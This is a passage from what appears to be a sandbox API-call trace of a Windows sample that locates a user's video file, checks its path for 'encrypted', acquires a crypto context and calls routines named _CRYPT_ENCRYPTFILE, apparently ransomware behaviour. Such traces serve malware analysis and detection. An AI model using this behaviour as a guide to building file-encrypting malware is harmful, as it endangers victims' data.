hHeap=0x770000) returned 1 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.244] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889538 [0042.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889538, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.245] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0042.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.245] CloseHandle (hObject=0x140) returned 1 [0042.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.245] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0042.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.246] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.246] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.246] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.246] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0042.246] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.246] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0042.246] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0042.246] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.246] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.246] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.246] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.246] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.247] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.247] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.247] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66381900, ftCreationTime.dwHighDateTime=0x1d5c065, ftLastAccessTime.dwLowDateTime=0x2ecab3d0, ftLastAccessTime.dwHighDateTime=0x1d5c47d, ftLastWriteTime.dwLowDateTime=0x2ecab3d0, ftLastWriteTime.dwHighDateTime=0x1d5c47d, nFileSizeHigh=0x0, nFileSizeLow=0xf447, dwReserved0=0x0, dwReserved1=0x777648, cFileName="dqh_rUYpMIjJ4.mkv", cAlternateFileName="DQH_RU~1.MKV")) returned 0x7c20c0 [0042.247] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.247] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.247] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66381900, ftCreationTime.dwHighDateTime=0x1d5c065, ftLastAccessTime.dwLowDateTime=0x2ecab3d0, ftLastAccessTime.dwHighDateTime=0x1d5c47d, ftLastWriteTime.dwLowDateTime=0x2ecab3d0, ftLastWriteTime.dwHighDateTime=0x1d5c47d, nFileSizeHigh=0x0, nFileSizeLow=0xf447, dwReserved0=0x0, dwReserved1=0x777648, cFileName="dqh_rUYpMIjJ4.mkv", cAlternateFileName="DQH_RU~1.MKV")) returned 0x7c20c0 [0042.247] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.247] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKe8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ke8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dqh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qh_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rUYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UYpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YpMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pMIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MIjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IjJ4.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.249] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.249] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.249] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.249] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.249] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.249] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.249] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.249] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.249] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.249] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66381900, ftCreationTime.dwHighDateTime=0x1d5c065, ftLastAccessTime.dwLowDateTime=0x2ecab3d0, ftLastAccessTime.dwHighDateTime=0x1d5c47d, ftLastWriteTime.dwLowDateTime=0x2ecab3d0, ftLastWriteTime.dwHighDateTime=0x1d5c47d, nFileSizeHigh=0x0, nFileSizeLow=0xf447, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="dqh_rUYpMIjJ4.mkv", cAlternateFileName="DQH_RU~1.MKV")) returned 0x7c2100 [0042.250] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.250] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.250] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.250] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.250] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.250] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.250] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.250] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.250] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.250] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.250] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.250] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.250] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.250] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0042.252] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.252] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.252] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.252] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.252] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: 